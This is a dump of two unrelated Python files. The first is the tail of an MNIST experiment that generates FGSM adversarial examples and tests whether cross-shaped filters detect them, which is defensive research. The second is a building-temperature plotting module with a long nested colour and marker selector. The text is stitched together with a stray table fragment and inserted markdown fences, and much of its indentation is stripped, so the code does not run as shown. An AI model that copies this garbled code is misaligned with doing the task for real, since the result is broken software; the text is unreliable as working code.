wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.2,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[:4500]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in range(4500):
normalization(adv_x[i:(i+1)])
print('adversarial examples generation time = ', advGenTime, 'seconds')
crosses = [np.array([[0,1,0],[1,1,1],[0,1,0]]),
np.array([[0,0,1,0,0],
[0,0,1,0,0],
[1,1,1,1,1],
[0,0,1,0,0],
[0,0,1,0,0]]),
np.array([[0,0,0,1,0,0,0],
[0,0,0,1,0,0,0],
[0,0,0,1,0,0,0],
[1,1,1,1,1,1,1],
[0,0,0,1,0,0,0],
[0,0,0,1,0,0,0],
[0,0,0,1,0,0,0]]),
np.array([[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[1,1,1,1,1,1,1,1,1],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],])]
coefficient = [5,9, 13, 17]
#cross filter test, kernel size: 3, 5, 7, 9
kernelIndex = -1
for kernelSize in range(3, 10, 2):
startTime = time.time()
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
start = (kernelSize-1)//2
end = 28-start
kernelIndex+=1
print('cross filter')
print(crosses[kernelIndex])
for i in range(4500):
current_class = int(np.argmax(Y_test[i]))
currentXLabel = model_argmax(sess,x,predictions,X_test[i:(i+1)])
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
test_number+=1
currentX = np.reshape(X_test[i:(i+1)], (28,28))
currentX = diamondAndCrossFilterOperations(currentX, crosses[kernelIndex], start, end, coefficient[kernelIndex])
currentX = np.reshape(currentX, X_test[i:(i+1)].shape)
currentXFilteredLabel = model_argmax(sess,x,predictions,currentX)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
currentAdvX = diamondAndCrossFilterOperations(currentAdvX, crosses[kernelIndex], start, end, coefficient[kernelIndex])
currentAdvX = np.reshape(currentAdvX, X_test[i:(i+1)].shape)
currentAdvXFilteredLabel = model_argmax(sess,x,predictions,currentAdvX)
if currentAdvXFilteredLabel != currentAdvXLabel:
TP+=1
if currentAdvXFilteredLabel == current_class:
TTP+=1
else:
FN+=1
if currentXFilteredLabel != currentXLabel:
FP+=1
if (i+1) % 1000 == 0:
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall = TP / (TP + FN) if (TP + FN) else 0.0
Precision = TP / (TP + FP) if (TP + FP) else 0.0
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
return report
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
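# All three cells call normalization on each adversarial example after
# generation; the helper is not defined in this excerpt. A minimal sketch,
# assuming it clips pixels back into the model's valid [0, 1] range in place
# (matching the fgsm clip_min/clip_max parameters):

```python
import numpy as np

def normalization(batch):
    """Hypothetical stand-in for the notebook's normalization helper:
    clip the batch into [0, 1] in place."""
    np.clip(batch, 0.0, 1.0, out=batch)
    return batch
```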
#-----------------------------------------------------------------
# File: src/plotprops.py  (repo: RWTH-EBC/WinProGen, license: MIT)
#-----------------------------------------------------------------
] | null | null | null | '''
Created on 18.03.2015
@author: Marco Bertinelli
'''
import pandas as pd
from pandas import Series, DataFrame, MultiIndex
import matplotlib.pyplot as plt
import matplotlib
import matplotlib.gridspec as gridspec
import numpy as np
from matplotlib.patches import Polygon
# import HistoQhObs as HistoQhObs
# import HistoQhObs_Together as HistoQhObs_Together
# import plotDiurnalValidateNew as plotDiurnalValidateNew
# import plotWAT as plotWAT
sizeText = 10
params = {'backend': 'wxAgg', 'lines.markersize': 6,
          'axes.labelsize': sizeText, 'mathtext.default': 'regular',
          'font.size': sizeText,  # 'text.fontsize' was removed from matplotlib
          'axes.titlesize': sizeText, 'legend.fontsize': sizeText,
          'xtick.labelsize': sizeText, 'ytick.labelsize': sizeText}
plt.rcParams.update(params)
fontsize_XLabel = 14
fontsize_YLabel = 14
fontsize_title = 14
fontsize_XTicks = 14
fontsize_YTicks = 14
fontsize_Legend = 14
WithLegendFrame = False
def create_Standardfigure():
"""
prepares a figures """
fontsize_XLabel = 14
fontsize_YLabel = 14
fontsize_title = 14
fontsize_XTicks = 14
fontsize_YTicks = 14
fontsize_Legend = 14
WithLegendFrame = False
fig = plt.figure(figsize=(8, 5))
fig.subplots_adjust(left=0.15)
gs1 = gridspec.GridSpec(1, 1)
ax = plt.subplot(gs1[0, :])
ax.set_ylim(0,1.1)
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.3, box.width, box.height * 0.7])
#ax.set_xticks(np.linspace(ticks[0], d.date2num(d.num2date(ticks[-1]) + dt.timedelta(hours=3)), 5))
#ax.set_xticks(np.linspace(ticks[0], d.date2num(d.num2date(ticks[-1]) + dt.timedelta(hours=3)), 25), minor=True)
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%I:%M %p'))
# Note: this legend is created before any lines are plotted, so matplotlib
# warns about missing handles; call ax.legend(...) again after plotting
ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.2), frameon=WithLegendFrame, ncol=2, fontsize=fontsize_Legend)
return fig, ax
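# The box-shrinking trick in create_Standardfigure (freeing the lower 30% of
# the axes area so the legend fits below the plot) works standalone; a sketch
# using a headless backend, with a dummy line so the legend has a handle:

```python
import matplotlib
matplotlib.use("Agg")  # headless backend so this runs without a display
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec

fig = plt.figure(figsize=(8, 5))
gs = gridspec.GridSpec(1, 1)
ax = fig.add_subplot(gs[0, :])
box = ax.get_position()
# Shift the axes up and shrink it to 70% height; the legend goes below
ax.set_position([box.x0, box.y0 + box.height * 0.3, box.width, box.height * 0.7])
ax.plot([0, 1], [0, 1], label="demo")
leg = ax.legend(loc="upper center", bbox_to_anchor=(0.5, -0.2), ncol=2)
```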
def Histogram_AT():
recFolder = 'D:/ghi-mbe/Daten Auswertung/records/AT/'
t_1 = 5.0
t_2 = 11.0
t_3 = 14.0
t_4 = 18.0
n_0 = "<5" # "A"
n_1 = "5>11" # "B"
n_2 = "11>14" # "C"
n_3 = "14>18" # "D"
n_4 = ">18" # "E"
n_0 = "A"
n_1 = "B"
n_2 = "C"
n_3 = "D"
n_4 = "E"
def categorize(value):
    # Map a temperature to its bin label (shared by func_AT and func_rAT)
    if value <= t_1:
        return n_0
    elif value <= t_2:
        return n_1
    elif value <= t_3:
        return n_2
    elif value <= t_4:
        return n_3
    return n_4
def func_AT(row):
    return categorize(row["Weather", "-", "-", "AT"])
def func_rAT(row):
    return categorize(row["Weather", "-", "-", "rAT"])
df1=pd.read_csv(recFolder+'AT2012.csv',index_col=0,sep=';', header=[0,1,2,3],low_memory=False,parse_dates=True)
df1["Weather","-","-","rAT"] = df1.apply(pd.Series.round)
df1["Weather","-","-","Kategorie_AT"] = df1.apply(func_AT, axis=1)
df1["Weather","-","-","Kategorie_rAT"] = df1.apply(func_rAT, axis=1)
# Count occurrences of each category
Kategorie_A = df1[df1["Weather","-","-","Kategorie_AT"]=="A"]
Kategorie_B = df1[df1["Weather","-","-","Kategorie_AT"]=="B"]
Kategorie_C = df1[df1["Weather","-","-","Kategorie_AT"]=="C"]
Kategorie_D = df1[df1["Weather","-","-","Kategorie_AT"]=="D"]
Kategorie_E = df1[df1["Weather","-","-","Kategorie_AT"]=="E"]
Kategorie_rA = df1[df1["Weather","-","-","Kategorie_rAT"]=="A"]
Kategorie_rB = df1[df1["Weather","-","-","Kategorie_rAT"]=="B"]
Kategorie_rC = df1[df1["Weather","-","-","Kategorie_rAT"]=="C"]
Kategorie_rD = df1[df1["Weather","-","-","Kategorie_rAT"]=="D"]
Kategorie_rE = df1[df1["Weather","-","-","Kategorie_rAT"]=="E"]
# Overall category counts
print("Category A:", len(Kategorie_A), "Category rA:", len(Kategorie_rA))
print("Category B:", len(Kategorie_B), "Category rB:", len(Kategorie_rB))
print("Category C:", len(Kategorie_C), "Category rC:", len(Kategorie_rC))
print("Category D:", len(Kategorie_D), "Category rD:", len(Kategorie_rD))
print("Category E:", len(Kategorie_E), "Category rE:", len(Kategorie_rE))
print("Total A-E:", len(Kategorie_A) + len(Kategorie_B) + len(Kategorie_C) + len(Kategorie_D) + len(Kategorie_E))
print("Total rA-rE:", len(Kategorie_rA) + len(Kategorie_rB) + len(Kategorie_rC) + len(Kategorie_rD) + len(Kategorie_rE))
# Count category transitions between consecutive timesteps
Wechsel_A_B = 0
Wechsel_B_C = 0
Wechsel_C_D = 0
Wechsel_D_E = 0
kat = df1["Weather", "-", "-", "Kategorie_AT"]
for index in range(len(kat) - 1):
    # .iloc gives positional access; plain [index] on a column with a
    # DatetimeIndex would be interpreted as a label lookup
    if kat.iloc[index] == "A" and kat.iloc[index + 1] == "B":
        Wechsel_A_B += 1
    if kat.iloc[index] == "B" and kat.iloc[index + 1] == "C":
        Wechsel_B_C += 1
    if kat.iloc[index] == "C" and kat.iloc[index + 1] == "D":
        Wechsel_C_D += 1
    if kat.iloc[index] == "D" and kat.iloc[index + 1] == "E":
        Wechsel_D_E += 1
# Separate weekdays from weekend days
df1['dayNumber'] = df1.index.weekday
onlyWeekdays = df1[df1['dayNumber']<5]
onlyWeekend = df1[df1['dayNumber']>=5]
print ("Histogram_AT done")
def Select_ColorsAndMarkers(Level0="", Level2="",Level3="", Level4="", Level5=""):
markEntr_Alt1 = True
print ("Start SelectAnalysisFunction")
# ColorList Level0
colorsTemperature=["LimeGreen",'Indigo','RoyalBlue','DeepSkyBlue','Orange','Red']
markersTemperature=['^','o','s','*','d','v']
# ColorList Level2
colorsEntrances=["LimeGreen","ForestGreen","DarkGreen","LightSkyBlue","CornflowerBlue","DarkSlateBlue"]
if markEntr_Alt1:
    markersEntrances = ['^', 'o', 's', '*', 'd', 'v']  # alternative 1
else:
    markersEntrances = ['^', 'o', 's', '^', 'o', 's']  # alternative 2
# ColorList Level3
colorsAps=["Sienna","FireBrick","Red","OrangeRed","Tomato","DeepPink","Fuchsia","Magenta","MediumVioletRed","Crimson","LimeGreen"]
markersAps=["s",'^','o','h','+','x','s','p','*','d',None]
# ColorList Level4
colorRooms=["LimeGreen",'Crimson','GoldenRod','CornflowerBlue',"DarkGreen",'MidnightBlue']
markersRooms=[None,'^','o','s','*','d']
# Validity check lists
CheckTemperatures = ["T1","T2","T3","T4","T5"]
CheckTemperatures = ["T0","T1","T2","T3","T4","T5"]
CheckEntrances = ["B2E1","B2E2","B2E3","B3E1","B3E2","B3E3"]
CheckApartments = ["A01","A02","A03","A04","A05","A06","A07","A08","A09","A10",'-']
CheckRooms = ['-', "Room_Bath","Room_Children","Room_Kitchen","Room_Living","Room_Sleeping",]
if Level0 == "T0":
#print "Nur eine Linie, also alle Temperaturbereiche zusammen"
if Level2 == None:
#print "Alle Eingaenge"
if Level3 == "-":
#print "mean von allen Apartments"
if Level4 == "-":
#print "mean von allen Rooms"
if Level5 == "WP1":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
elif Level4 in CheckRooms:
#print Level4
if Level5 == "WP1":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
elif Level3 in CheckApartments:
if Level4 == "-":
    # Mean over all rooms
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsEntrances
    markerList = markersEntrances
    title = ["T0","allBuildings",Level3,"meanRooms",Level5]
    labels = CheckEntrances
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
elif Level4 in CheckRooms:
#print Level4
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsEntrances
    markerList = markersEntrances
    title = ["T0","allBuildings",Level3,Level4,Level5]
    labels = CheckEntrances
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level4 selection")
else:
print("ERROR: invalid Level3 selection")
elif Level2 in CheckEntrances:
#print Level2
if Level3 == "-":
#print "mean of all Apartments"
if Level4 == "-":
#print "mean of all Rooms"
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsEntrances[CheckEntrances.index(Level2)]
    markerList = markersEntrances[CheckEntrances.index(Level2)]
    title = ["T0", Level2,"meanApartments","meanRooms",Level5]
    labels = [""]
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
elif Level4 is None:
print("All Rooms")
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorRooms
    markerList = markersRooms
    title = ["T0", Level2,"meanApartments","allRooms",Level5]
    labels = CheckRooms
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
elif Level4 in CheckRooms:
#print Level4
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorRooms[CheckRooms.index(Level4)]
    markerList = markersRooms[CheckRooms.index(Level4)]
    title = ["T0", Level2,"meanApartments",Level4,Level5]
    labels = [""]
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
else:
print("ERROR: invalid Level4 selection")
elif Level3 is None:
#print "All Apartments"
if Level4 == "-":
#print "mean of all Rooms"
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsAps
    markerList = markersAps
    title = ["T0", Level2,"allApartments","meanRooms",Level5]
    labels = CheckApartments
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
elif Level4 in CheckRooms:
#print Level4
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsAps
    markerList = markersAps
    title = ["T0", Level2,"allApartments",Level4,Level5]
    labels = CheckApartments
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
else:
print("ERROR: invalid Level4 selection")
elif Level3 in CheckApartments:
#print Level3
if Level4 == "-":
#print "mean of all Rooms"
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsAps[CheckApartments.index(Level3)]
    markerList = markersAps[CheckApartments.index(Level3)]
    title = ["T0", Level2,Level3,"meanRooms",Level5]
    labels = [""]
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
elif Level4 is None:
#print "All Rooms"
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorRooms
    markerList = markersRooms
    title = ["T0", Level2,Level3,"allRooms",Level5]
    labels = CheckRooms
    # Fix: the WP2 branch previously omitted selctionStrings and returned
    # only four values; all branches now return the same five-tuple.
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
elif Level4 in CheckRooms:
#print Level4
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorRooms[CheckRooms.index(Level4)]
    markerList = markersRooms[CheckRooms.index(Level4)]
    title = ["T0", Level2,Level3,Level4,Level5]
    labels = [""]
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
else:
print("ERROR: invalid Level4 selection")
else:
print("ERROR: invalid Level3 selection")
else:
print("ERROR: Level2 selection is ambiguous")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
#-----------------------------------------------------------------
#-----------------------------------------------------------------
elif Level0 is None:
print("All lines, i.e. T0 ..... T5")
if Level2 in CheckEntrances:
#print Level2
if Level3 == "-":
#print "mean of all Apartments"
if Level4 == '-':
#print "mean of all Rooms"
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsTemperature
    markerList = markersTemperature
    title = [Level2,"meanApartments", "meanRooms", Level5]
    labels = CheckTemperatures
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
elif Level4 in CheckRooms:
#print Level4
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsTemperature
    markerList = markersTemperature
    title = [Level2,"meanApartments", Level4, Level5]
    labels = CheckTemperatures
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
else:
print("ERROR: invalid Level4 selection")
elif Level3 in CheckApartments:
#print Level3
if Level4 == '-':
#print "mean of all Rooms"
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsTemperature
    markerList = markersTemperature
    title = [Level2,Level3, "meanRooms", Level5]
    labels = CheckTemperatures
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print("ERROR: invalid Level5 selection")
elif Level4 in CheckRooms:
#print Level4
if Level5 in ("WP1","WP2","WP1+2","WP","WPD","WPS"):
    #print Level5
    colorList = colorsTemperature
    markerList = markersTemperature
    title = [Level2,Level3,Level4, Level5]
    labels = CheckTemperatures
    selctionStrings = [Level0,Level2,Level3,Level4,Level5]
    return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
else:
    print("ERROR: Level3 selection not valid")
else:
    print("ERROR: Level2 selection ambiguous")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
#-----------------------------------------------------------------
#-----------------------------------------------------------------
elif Level0 in ["T1", "T2", "T3", "T4", "T5"]:
    # Throughout this block the six WP selections shared identical branch
    # bodies; they are collapsed into one membership test per case.
    wpSelections = ("WP1", "WP2", "WP1+2", "WP", "WPD", "WPS")
    if Level2 in CheckEntrances:
        if Level3 == "-":
            if Level4 == "-":
                if Level5 in wpSelections:
                    colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
                    markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
                    title = [Level2, "meanApartments", "meanRooms", Level5]
                    labels = ["T0", Level0]
                    selctionStrings = [["T0", Level0], Level2, Level3, Level4, Level5]
                    return colorList, markerList, title, labels, selctionStrings
                else:
                    print("ERROR: Level5 selection not valid")
            elif Level4 in CheckRooms:
                if Level5 in wpSelections:
                    colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
                    markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
                    title = [Level2, "meanApartments", Level4, Level5]
                    labels = ["T0", Level0]
                    selctionStrings = [["T0", Level0], Level2, Level3, Level4, Level5]
                    return colorList, markerList, title, labels, selctionStrings
                else:
                    print("ERROR: Level5 selection not valid")
            else:
                print("ERROR: Level4 selection not valid")
        elif Level3 in CheckApartments:
            if Level4 == "-":
                if Level5 in wpSelections:
                    colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
                    markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
                    title = [Level2, Level3, "meanRooms", Level5]
                    labels = ["T0", Level0]
                    selctionStrings = [["T0", Level0], Level2, Level3, Level4, Level5]
                    return colorList, markerList, title, labels, selctionStrings
                else:
                    print("ERROR: Level5 selection not valid")
            elif Level4 in CheckRooms:
                if Level5 in wpSelections:
                    colorList = [colorsTemperature[0]] + [colorsTemperature[CheckTemperatures.index(Level0)]]
                    markerList = [markersTemperature[0]] + [markersTemperature[CheckTemperatures.index(Level0)]]
                    title = [Level2, Level3, Level4, Level5]
                    labels = ["T0", Level0]
                    selctionStrings = [["T0", Level0], Level2, Level3, Level4, Level5]
                    return colorList, markerList, title, labels, selctionStrings
                else:
                    print("ERROR: Level5 selection not valid")
            else:
                print("ERROR: Level4 selection not valid")
        else:
            print("ERROR: Level3 selection not valid")
    else:
        print("ERROR: Level2 selection ambiguous")
else:
    print("ERROR: Level0[0] selection ambiguous")
print("End of SelectAnalysisFunction")
def english2German(titleList, labelList):
    translateDictionary = {"B2E1": "R2E1",
                           "B2E2": "R2E2",
                           "B2E3": "R2E3",
                           "B3E1": "R3E1",
                           "B3E2": "R3E2",
                           "B3E3": "R3E3",
                           "allBuildings": "Gebaeude",
                           "meanApartments": "Durchschnitt Wohnung",
                           "allApartments": "Wohnung",
                           "Room_Sleeping": "Schlafzimmer",
                           "Room_Kitchen": u"Kueche",
                           "Room_Children": "Kinderzimmer",
                           "Room_Living": "Wohnzimmer",
                           "Room_Bath": "Badezimmer",
                           "allRooms": "Zimmer",
                           "meanRooms": "Durchschnitt Zimmer",
                           "T0": "ATR",
                           "T1": r'DAT $\leq$ 5',
                           "T2": r"5 $\leq$ DAT $\leq$ 11",
                           "T3": r"11 $\leq$ DAT $\leq$ 14",
                           "T4": r"14 $\leq$ DAT $\leq$ 18",
                           "T5": r"DAT $\geq$ 18",
                           "-": "Durchschnitt"}
    # Unknown components pass through untranslated.
    new_titleList = [translateDictionary.get(c, c) for c in titleList]
    new_labelList = [translateDictionary.get(c, c) for c in labelList]
    return new_titleList, new_labelList
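The translation helpers above all follow the same dict-lookup-with-fallback pattern. A minimal stand-alone sketch of that pattern (the `translate_components` helper and the small mapping below are illustrative only, not part of the module's full dictionaries):

```python
def translate_components(components, mapping):
    # Known components are translated; unknown ones pass through unchanged.
    return [mapping.get(c, c) for c in components]

demo = translate_components(
    ["T0", "Room_Kitchen", "WP1"],            # "WP1" has no entry
    {"T0": "ATR", "Room_Kitchen": "Kueche"})  # illustrative subset only
print(demo)  # ['ATR', 'Kueche', 'WP1']
```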
def codifyL1(codeList):
    if codeList[0] is None:
        return codeList
    codeListZ = codeList[0]
    translateDictionary = {'T0': 'ATR',
                           'T1': 'AT Daily Average <= 5',
                           'T2': '5 < AT Daily Average <= 11',
                           'T3': '11 < AT Daily Average <= 14',
                           'T4': '14 < AT Daily Average <= 18',
                           'T5': '18 < AT Daily Average'}
    try:
        stringTypes = basestring  # Python 2
    except NameError:
        stringTypes = str  # Python 3
    if isinstance(codeListZ, stringTypes):
        codeListZ = [codeListZ]
    new_codeList = [translateDictionary.get(c, c) for c in codeListZ]
    codeList[0] = new_codeList[0]
    print(new_codeList[0])
    return codeList
def english2English(titleList, labelList):
    translateDictionary = {"B2E1": "B2E1",
                           "B2E2": "B2E2",
                           "B2E3": "B2E3",
                           "B3E1": "B3E1",
                           "B3E2": "B3E2",
                           "B3E3": "B3E3",
                           "allBuildings": "all buildings",
                           "meanApartments": "Mean Apartment",
                           "allApartments": "all Apartments",
                           "Room_Sleeping": "Sleeping room",
                           "Room_Kitchen": "Kitchen",
                           "Room_Children": "Children room",
                           "Room_Living": "Living room",
                           "Room_Bath": "Bathroom",
                           "allRooms": "all Rooms",
                           "meanRooms": "Mean rooms",
                           "T0": "ATR",
                           "T1": r'DAT $\leq$ 5',
                           "T2": r"5 $\leq$ DAT $\leq$ 11",
                           "T3": r"11 $\leq$ DAT $\leq$ 14",
                           "T4": r"14 $\leq$ DAT $\leq$ 18",
                           "T5": r"DAT $\geq$ 18",
                           "-": "Average"}
    # Unknown components pass through unchanged.
    new_titleList = [translateDictionary.get(c, c) for c in titleList]
    new_labelList = [translateDictionary.get(c, c) for c in labelList]
    return new_titleList, new_labelList
